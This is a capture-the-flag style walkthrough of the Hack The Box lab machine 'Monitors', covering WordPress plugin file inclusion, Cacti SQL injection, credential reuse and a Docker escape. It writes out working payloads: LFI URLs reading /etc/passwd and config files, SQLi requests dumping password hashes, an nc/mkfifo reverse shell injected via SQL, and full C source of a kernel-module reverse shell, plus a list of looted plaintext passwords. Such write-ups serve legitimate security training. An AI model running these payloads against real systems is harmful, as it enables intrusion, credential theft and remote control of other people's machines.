![](img/Pasted%20image%2020210424224218.png)

Started off with Nmap and only say http80 and ssh 22 open
```Bash
ports=$(nmap -p- --min-rate=1000  -T4 10.10.10.238 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.10.10.238
```

![](img/Pasted%20image%2020210424154842.png)

When visiting the HTTP page I saw that the page said no direct IP access, and on the page say monitors.htb as the domain name , so added that to hosts file .
```bash
echo "10.10.10.238 monitors.htb">>/etc/hosts
```
Then used feroxbuster to scan the directories
```bash
feroxbuster --url http://monitors.htb --scan-limit 0 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
```
and immediately recognized some of the directories names as belonging to Wordpress.  So I fired up wpscan

```bash
wpscan --url http://monitors.htb/ -e ap,t,tt,u
```
One of the plugin results was for spritz plugin from 2015 and quickly found an [RFI/LFI exploit ](https://www.exploit-db.com/exploits/44544)

![](img/Pasted%20image%2020210425205606.png)
![](img/Pasted%20image%2020210425205655.png)

THe LFI is a directory transversal which allowed you too read local files as www-data user. This also included a way to unintentionally get user creds which I'll go over at the end of the walkthrough.
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

![](img/Pasted%20image%2020210424163701.png)

Knowing that Wordpress has a wp-config.php file which usually holds database creds, but now uses auth keys, I tried to read that file. at first I only got a portion of the file, when viewing the page source It looks like the  plaintext old way was commented out, but included a password. I tried using that password along with variations of the year s trying to log into wordpress but couldnt log in.
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../..//wp-config.php

![](img/Pasted%20image%2020210424164639.png)
![](img/Pasted%20image%2020210424164818.png)

So I started to look for other ways to get a foothold onto the box and found you can get Apache access logs Every process can access its available information by requesting the /proc/self directory.  /proc/self/environ is - roughly- equal to /proc/<apache_pid>/environ. An easy way to figure out which one is Apache is using Burpsuite Intruder, basically capture the connection then send it to intruder, set the position parameters, then in payloads uyse the number payload 1-15 and then launch the attack. You'll see 10 gives you a big response code. Once we check the response we can see the access logs.

![](img/Pasted%20image%2020210425212807.png)
![](img/Pasted%20image%2020210425213147.png)
![](img/Pasted%20image%2020210425213522.png)

* Use LFI to include /proc/self/fd/10 to get the apache access log.
* From the access log, you'll see new vhost 'http://cacti-admin.monitor.htb' - add this to your hosts file
* Use Wordpress database password to log in to Cacti as admin user.
* http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/proc/self/fd/10

# Foothold
So we visit the url http://cacti-admin.monitors.htb/cacti/ and see some cactus software, dont see anything in searchsploit so we google for vulnerabilties and come across a [github issue ](https://github.com/Cacti/cacti/issues/3622)

![](img/Pasted%20image%2020210424175322.png)
![](img/Pasted%20image%2020210424175802.png)

We see that its vulnerable to a SQLi attack, with the example showing the hashes of the user db.
```
GET /cacti/color.php?action=export&header=false&filter=1')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+user_auth+set+username='sqli'+where+id=3;--+- HTTP/1.1
```
```
GET /cacti/color.php?action=export&header=false&filter=')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;--+- HTTP/1.1
```

```
http://cacti-admin.monitors.htb/cacti/color.php?action=export&header=false&filter=1%27)+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+user_auth+set+username=%27sqli%27+where+id=3;--+-
```

![](img/Pasted%20image%2020210424181756.png)

so for some reason, probably caching or something I wasn't able to get any reverse shell working, I found that logout/login to get a new cookie worked along with , if you read the complete github issue, someone showed they could write to disk if they used the `reindex` action.  So testing out a 
```
GET /cacti/color.php?action=export&header=false&filter=1')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value='`rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.185+1234+>/tmp/f`;'+where+name='path_php_binary';--+- HTTP/1.1
```
then hit this url
http://cacti-admin.monitors.htb/cacti/host.php?action=reindex
amd you should be greeted with a shell

![](img/Pasted%20image%2020210424235450.png)
```bash 
python -c 'import pty; pty.spawn("/bin/bash")'
```

# User
Doing some recon we see something in crontab, then look at the service in more detail, then we see it calling a backup script ina a user names marcu' home directory. In that script is a password, let's try to SSH as marcus with that password.

![](img/Pasted%20image%2020210425001034.png)
![](img/Pasted%20image%2020210425001257.png)
![](img/Pasted%20image%2020210425001335.png)
![](img/Pasted%20image%2020210425001520.png)
```bash
ssh marcus@monitors.htb
```
![](img/Pasted%20image%2020210425002140.png)
![](img/Pasted%20image%2020210425002118.png)

# Root
Doing some recon as the marcus user we check the running processes and netstat and see that theres something running on port 8443, so lets login in as marcus again but proxy a connection on port 8443 to the localmachine.
```Bash
ssh -L 8443:localhost:8443  marcus@monitors.htb
```


![](img/Pasted%20image%2020210425234119.png)

Looking quick its running Tomcat, after spending time looking for any new exploits , nothing came up that was relevant, I was also running feroxbuster again to see if I can  find any tomcat app URLs. I found something in the /marketing directory.  

![](img/Pasted%20image%2020210425183750.png)

Looking at the sourcde code  of the page I googled for some `ofbiz` exploits, I also found one in Metasploit for a deserialization attack. 
[CVE-2021-26295](https://issues.apache.org/jira/browse/OFBIZ-12167)

![](img/Pasted%20image%2020210425234457.png) which dropped me in as root in a docker container. 

I followed this [article](https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd) which goes into detail on how to breakout of a Docker container by abusing SYS_MODULE capability. They even have a nice video walkthrough that I found after in their [labs](https://attackdefense.com/challengedetailsnoauth?cid=1199) so we check for the capability using capsh. Then continue with the PoC .c code offered in the article to get a reverseshell

![](img/Pasted%20image%2020210425185420.png)

![](img/Pasted%20image%2020210425235136.png)

- sploit.c
```C
#include <linux/kmod.h\>
#include <linux/module.h\>

MODULE\_LICENSE("GPL");
MODULE\_AUTHOR("AttackDefense");
MODULE\_DESCRIPTION("LKM reverse shell module");
MODULE\_VERSION("1.0");

char\* argv\[\] = {"/bin/bash","\-c","bash -i >& /dev/tcp/172.17.0.2/4444 0>&1", NULL};

static char\* envp\[\] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int \_\_init reverse\_shell\_init(void) {
return call\_usermodehelper(argv\[0\], argv, envp, UMH\_WAIT\_EXEC);
}

static void \_\_exit reverse\_shell\_exit(void) {
printk(KERN\_INFO "Exiting\\n");
}
module\_init(reverse\_shell\_init);
module\_exit(reverse\_shell\_exit);
```
- Makefile
```bash
obj-m +=sploit.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
```

I ended up just transferring the code and Makefile to the box with curl instead of using Vi to write it directly in the container to save time.

![](img/Pasted%20image%2020210425190156.png)

![](img/Pasted%20image%2020210425190836.png)

then just run `make` then use `insmod` install the module into the kernel

![](img/Pasted%20image%2020210425190924.png)

and soon after we get our shell

![](img/Pasted%20image%2020210426000356.png)

![](img/Pasted%20image%2020210425191430.png)


# LOOT:
- admin@monitors.htb - not used
- admin:BestAdministrator@2020! -cacti login (from wordpress
- marcus:VerticalEdge2020 - ssh (from cron job)
# References: 
- https://www.exploit-db.com/exploits/44544
- https://github.com/mekhalleh/rfi-wp_sprit
- https://github.com/Cacti/cacti/issues/3622
- https://thehackernews.com/2021/03/critical-rce-vulnerability-found-in.html
- https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd

# Unintended
So apparently there was an unintended way to get user , when we originally had LFI with spritz, we could have just read crontab and skipped over the headache of getting a footrhold through SQLi i cacti.
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/crontab

![](img/Pasted%20image%2020210426000136.png)

http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/systemd/system/cacti-backup.service

![](img/Pasted%20image%2020210426000220.png)

http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/home/marcus/.backup/backup.sh

![](img/Pasted%20image%2020210426000249.png)
